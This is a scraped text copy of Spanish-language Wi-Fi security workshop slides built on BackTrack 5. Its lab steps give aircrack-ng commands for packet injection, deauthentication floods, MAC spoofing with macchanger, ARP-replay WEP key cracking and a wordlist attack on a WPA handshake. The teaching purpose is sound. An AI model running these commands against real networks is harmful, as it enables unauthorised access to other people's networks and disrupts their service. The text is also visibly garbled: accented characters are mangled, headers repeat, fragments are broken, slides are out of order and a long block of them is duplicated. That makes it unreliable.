httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 7: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

